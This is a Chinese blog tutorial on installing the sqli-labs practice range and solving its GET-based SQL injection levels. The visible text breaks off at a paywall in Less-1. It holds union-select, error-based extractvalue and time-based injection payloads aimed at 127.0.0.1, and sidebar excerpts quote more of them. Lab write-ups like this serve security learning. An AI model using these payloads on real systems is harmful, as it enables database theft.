SQLI_LIBS靶场搭建与1-10GET型注入实战

最新推荐文章于 2024-08-14 21:05:20 发布
最新推荐文章于 2024-08-14 21:05:20 发布
阅读量479 收藏 1
点赞数
文章标签: sql php 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42261604/article/details/120085392
版权
本文介绍了SQLI_LIBS靶场的搭建过程,并通过1-10关GET型注入的实战,展示了如何利用注入漏洞获取数据库信息。从单引号注入到双引号变形,再到布尔型和时间型盲注,详细讲解了不同类型的SQL注入技巧,并给出了利用sqlmap工具的辅助方法。
摘要由CSDN通过智能技术生成

靶场搭建与1-10GET型注入实战

目录

靶场搭建与1-10GET型注入实战

环境准备

靶场环境初始化

Less-1

Less-2

Less-3

Less-4

Less-5

Less-6

Less-7

Less-8

Less-9

Less-10

环境准备

下载phpstudy

小皮面板(phpstudy) - 让天下没有难配的服务器环境!

下载sqli-labs靶场环境

GitHub - Audi-1/sqli-labs: SQLI labs to test error based, Blind boolean based, Time based.

运行phpstudy环境,开启apache和mysql

将php环境改为5版本,因为7版本删除了一些函数,靶场环境不能正常连接

靶场环境初始化

       将sqli靶场解压之后房子phpstudy的www目录下,访问127.0.0.1/sql

        点击Setup/reset Database for labs 进行靶场环境初始化

        初始化之后即可正常进行靶场测试了。

Less-1

       ‘单引号注入

       判断查询列数

http://127.0.0.1/sql/Less-1/?id=1' order by 4 -- - 报错

http://127.0.0.1/sql/Less-1/?id=1' order by 3 -- - 正常

       说明查询列数为3

       判断显示位

http://127.0.0.1/sql/Less-1/?id=-1' union select 1,2,3 -- - 确认显示位为2和3

       数据库名和数据库用户

http://127.0.0.1/sql/Less-1/?id=-1' union select 1,database(),user() -- - security和root@localhost

       表名

http://127.0.0.1/sql/Less-1/?id=-1' union sele

最低0.47元/天 解锁文章
MajorTom0
关注
靶场系列:sqllibs安装、sqli-labs靶场搭建以及闯关(1-22关)
weixin_54626591的博客
12-05 2906
sqllibs安装、sqli-labs靶场搭建以及闯关(1-22关)
SQLI-LIBS靶场23-24 #过滤以及二次注入实战
qq_42261604的博客
11-03 285
Less-23 Get单引号报错注入 输入过滤了-- # 并替代成空,故采用单引号闭合 http://127.0.0.1/sql/Less-23/?id=1' and 1='1 直接搜索已知的数据,成功 http://127.0.0.1/sql/Less-23/?id=1' and extractvalue(1,concat(0x7e,(select username from users limit 0,1),0x7e)) and 1='1 Le...
SQLI-LIBS靶场五-报错注入
qq_66291050的博客
05-18 209
less-5没有显存位了,不能使用联合查询,也就是说明UNION SELECT 1,2,3其中的1,2,3是不会被显示在网页返回的文字中。从靶场二跳到靶场五是因为其中真的没什么好讲的,把源码拿出来搞一个ECHO $sql 就可以在注入的时候看到执行语句的过程。这样写就差不多,当然了,细心的就会发现为什么是双引号闭合?首先,我们要了解一个MYSQL里面的UPDATEXML函数。发现是单引号,那么我们就用单引号闭合这个语句。这样写的,但是我发现,我这里是根本行不通的。剩下的我也懒得说,就这样。
sqli-labs靶场分析
RestoreJustice的博客
03-18 2514
这里是 基于WAF的一个错误引起的SQL注入,源代码level 29文件夹里有三个php文件,默认访问这个文件夹的index.php但这个文件是没有接入“WAF”的。在测试符号后面添加and sleep(5) --+,如果成功闭合前面的语句,则会执行sleep(5),利用延时注入的原理判断闭合方式。来看看第二种格式,第二种格式除了能像第一种格式一样得到数组内元素的值外,还能得到元素的索引值,并保存到$key变量中,如果数组的索引值未经过人工设定,则返回系统默认的设定值。第一个id的值符合规则,WAF放行。
sqli-labs靶场通关攻略
最新发布
test_zpx的博客
08-14 476
Good Good Study,Day Day Up!
SQLI-LIBS靶场21-22 cookie base64加密实战
qq_42261604的博客
09-28 132
Less-21 Cookie处单引号+)注入,base64编码 Cookie:uname= YWRtaW4nKSM= 绕过了 直接搜索前面获取的信息,成功 admin') and extractvalue(1,concat(0x7e,(select username from users limit 0,1),0x7e))# YWRtaW4nKSBhbmQgZXh0cmFjdHZhbHVlKDEsY29uY2F0KDB4N2UsKHNlbGV...
sqli-lib搭建phpstudy平台)
Arithmetic-logic
02-09 1758
下载源码:https://codeload.github.com/Audi-1/sqli-labs/zip/master 访问http://127.0.0.1/sqli-labs-master/less-1/ 修改数据库 找到这个文件导入mysql数据库 在mysql管理工具中新建security数据库并导入 再一次输入网址http://127.0.0.1/sqli-labs-master/less-1/,搭建完成 php版本最好是5.6以下,不然可能会报错 ...
PhpStudy 2016搭建-sqli-libs靶场
weixin_44257023的博客
07-13 556
PhpStudy 2016搭建-sqli-libs靶场
sqli-labs靶场(1-22关)
weixin_51566481的博客
08-16 7677
sqli-labs,sql注入,burpsuit
sqli-labs靶场练习笔记13-18
m0_47693317的博客
05-24 150
sqli-labs13-18Less-13:POST-Double Injection-Single quotes-String-with twist(基于POST的变形单引号字符注入)Less-14:POST-Double Injection-Single quotes-String-with twist(基于POST的变形单引号(双引号)字符注入)Less-15:POST-Blind-Boolian/time Based-Single quotes(基于POST的单引号布尔/时间盲注)Less-1
Sqli-labs靶场搭建(适合新手小白围观)
记录开发和安全学习过程中的点点滴滴
09-12 9028
本章是对SQL注入进行一个简单的回归,然后就是对于自己在搭建靶场中所遇到的一些问题的解决办法,以及进行安装步骤的总结,对于自己的自主配置和独立解决问题的能力是一种培养每日一言真正的有福之人,是经历极大的挫折磨难后,依然屹立不倒的人。一个人能承受的东西越多,他所能得到的馈赠才越多。
搭建sqli-libs靶场的反思
weixin_52116519的博客
10-17 205
搭建了几天,终于在几分钟前搭建好了。其实挺简单的,按照网上教程一般没有大问题。但是前提是:你的电脑还没有安装过其他的软件,比如mysqlPHPstudy等等。 彻底删掉已经安装的mysql服务,这个也是门技术活,网上有教程。 安装一个PHPstudy即可【我安装了两个,结果一直不行,一气之下,删掉了一个,然后按照教程就行了】。 懂得原理就很好,就会知道哪里出错了,然后修正。不知道就会一直在摸索,尽量所有环境都跟教程一样,不然小白就很难。 希望对你们有用!!! ...
sqli-libs(1-10关)
weixin_44216796的博客
11-29 475
urlib库 urllib库是Python中一个最基本的网络请求库。可以模拟浏览器的行为,向指定的服务器发送一个请求 ,并可以保存服务器返回的数据。 urlopen函数 在Python3的urllib库中,所有和网络请求相关的万法,都被集到urllib.request 模块下面了,以先来看下urlopen函数基本的使用: from urllib import request resp = request.urlopen(‘http://www.baidu.com’) #ctrl+b 查看参数 print(r
phpstudy小皮 sqli-libs 靶场搭建
qq_44637753的博客
10-08 1691
phpstudy小皮 sqli-labs 靶场搭建
sqli-labs靶场实战
u011417723的博客
03-08 2938
靶场实战
SQL注入sqli-labs环境搭建
weixin_69054284的博客
09-20 2864
往往很多新手在刚学习SQL注入的时候,都需要拥有一个能SQL注入的网站,需要有的。直接去互联网上找的话对新手未免有点太难了,因此:我们一般都是在本地搭建一个能SQL注入测试的网站,那样我们学习SQL注入就容易多了。Sqli-labs是一个印度程序员写的,用来学习的一个游戏教程。
Sql-labs靶场(1~28)
xhx836161547的博客
12-29 5144
sql注入经典靶场Sql-labs全关详解,正在加急更新中
sql-labs靶场环境搭建(手把手保姆级教学)
焦虑的焦虑
05-26 3450
sql-labs靶场搭建(保姆级手把手教学)你来你也行噢!
SQL注入学习之路:sqli-labs靶场实战解析
"sqli-labs靶场练习笔记涵盖了从2关到24关的SQL注入学习内容,适合初学者参考,涉及单引号、双引号注入,布尔盲注,数据库名、表名、列名的探测,以及利用注入进行文件写入和信息获取等技能。" 在SQL注入的学习过程...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值